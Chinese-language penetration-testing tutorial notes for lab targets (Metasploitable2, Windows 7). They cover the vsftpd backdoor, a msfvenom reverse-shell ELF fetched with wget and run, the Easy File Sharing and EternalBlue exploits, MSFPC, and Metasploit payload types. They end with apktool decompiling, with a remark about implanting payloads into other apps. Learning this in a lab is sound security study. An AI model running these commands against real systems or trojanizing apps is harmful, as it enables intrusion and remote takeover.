1、利用FTP漏洞並植入後門
實驗靶機:Metasploitable2。
實踐:
- 使用nmap掃描目標靶機
- nmap -sV xxx.xxx.xxx.xxx(目標ip)
- 生成linux系統後門
- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx(主控端ip) LPORT=5555 -f elf -o /home/xxxx(用戶名)/backdoor.elf
- 使用Apache服務在目標主機上下載後門
- sudo service apache2 start
- sudo cp home/xxxx(用戶名)/backdoor.elf /var/www/html/
- 在主控端瀏覽器打開apache服務的ip地址,然後右鍵elf文件,選擇Copy Link Location。
- 手工激活ftp後門。登錄名:user:)。密碼:pass
- 在主控端命令行輸入:ftp xxx.xxx.xxx.xxx(靶機ip)。
- 輸入登錄名密碼即可。
- 可以通過:nc xxx.xxx.xxx.xxx(靶機ip)。嘗試判斷是否啓用成功。
- 然後在nc的命令行中執行下面的命令,這個地址就是你之前右鍵複製的那個地址。
- wget http://192.168.10.129/backdoor.elf。
- 然後可以通過 cd / --> ls命令。看有沒有這個文件。
- 然後,啓用主控端。打開Metasploit,就跟之前一樣。
- use exploit/multi/handler
- set payload linux/x86/meterpreter/reverse_tcp
- set lhost xxx.xxx.xxx.xxx(主控端ip)
- set lport 5555
- run
- 在目標主機上運行後門。以下命令在nc的命令行中操作:
- ./backdoor.elf。你會發現權限不足。
- chmod 7777 ./backdoor.elf。
- 然後再執行就可以了:./backdoor.elf。
- 然後,你就可以在meterpreter中爲所欲爲了。
2、常用攻擊軟件
由於Windows7使用了比較安全的機制,所以入侵win7遠比入侵Windows xp要難得多。雖然系統本身很安全,但是我們不可能只安裝一個系統,就什麼都沒有了,系統內我們還會安裝很多軟件,我們就可以從這些應用軟件入手,去尋找他們的漏洞,藉助這些軟件做跳板,去入侵系統。
之前我們使用的是python腳本去攻擊Easy File Sharing軟件,使軟件卡死。併成功在目標計算機上打開了計算器,這回我們使用Metasploit來攻擊這個應用程序。
實驗靶機:Windows7。
實踐:
- search easyfilesharing。
- use exploit/windows/http/easyfilesharing_seh。
- set rhost xxx.xxx.xxx.xxx(目標ip)。
- set lport 6666。
- run。
- execute -f calc.exe。打開計算器。
3、攻擊Windows7系統藍屏
實驗靶機:Windows7。
實踐:
- search ms17-010。
- use exploit/windows/smb/ms17_010_eternalblue。
- set rhost xxx.xxx.xxx.xxx(目標ip)。
- set lport 6666。
- set payload windows/meterpreter/reverse_tcp。
- run。
- 然後Windows就藍屏了。
4、漏洞利用工具集:MSFPC
生成payload的默認工具是MSFvenom,這是一個獨立於Metasploit的payload生成器及編輯器。雖然它是一個非常強的payload生成神器,但是對於一個新手來說,可能難以在短時間內熟悉其操作。即使在進程最初的瞭解之後,生成一個基本的payload也需要輸入相當多的內容。
MSFPC,或者說是MSFvenom Payload生成器,其實是一個基於MSFvenom的payload生成器,它簡化了基本的有效載荷創建過程,用戶使用MSFPC可以儘可能簡單的創建Payload。
使用方法:
- 漏洞利用工具集 --> msf payload creator --> 打開他。
- sudo msfpc windows xxx.xxx.xxx.xxx(當前主機ip) 6666。
- 然後會生成這麼多東西:
- 其實就是把我們之前通過手動配置的東西都自動生成了。包括可執行文件、命令腳本等。我們看下如何來使用這些東西
- sudo service apache2 start。
- 跟之前一樣,把剛纔生成的可執行文件複製到Apache目錄下。這裏不寫了。
- msfconsole -q -r [上面生成的那個.rc文件地址]
- 查看session
- 使用session。
- 成功!
5、Payload 介紹
病毒通常會做一些有害的或者惡意的動作。在病毒代碼中實現這個功能的部分叫做“有效載荷(Payload)”。Payload可以實現任何運行在受害者環境中的程序所能做的事情。並且能夠執行動作包括破壞文件、刪除文件、向病毒的作者或者任意的接收者發送敏感信息,以及提供通向被感染計算機的後門。
Payloads模塊,也叫有效載荷或有效負載,也就是我們常說的shellcode。在MSF中爲我們提供了大量的Payloads。我們可以再MSF中通過show payloads命令查看。
payloads模塊的命名規則
操作系統/類型/模塊名稱:windows/shell/bind_tcp。
- shell_find_taf:在一個已建立的鏈接上創建一個shell
- shell_reverse_tcp:反向鏈接到攻擊者主機並創建一個shell
- bind_tcp:監聽一個tcp鏈接。
- reverse_tcp:反向建立tcp鏈接。
- add_user:創建一個新用戶並添加到管理組。
payloads模塊等級
等級代表好用程度,一般分爲以下幾個等級:
- normal:正常
- excellent:優秀
- great:極好
- good:好
- average:一般、平均
- manual:手動
查看payloads下的某個模塊的詳細信息
- info [模塊名]
- info windows/shell/bind_tcp
6、apk文件的反編譯
1)什麼是逆向工程?反編譯?
就是將已有的APP程序,反向操作,方便我們查看裏面的原始文件,因爲我們平時拿到的APP程序都是經過加密處理的。
2)反編譯有什麼用?
可以用來分析APP,比如獲取IP地址。將payload植入其他APP等等。
3)APK反編譯軟件——apktool
- 反編譯apk文件
- apktool d xxx.apk
- 將反編譯後的文件重新打包
- apktool b xxx.apk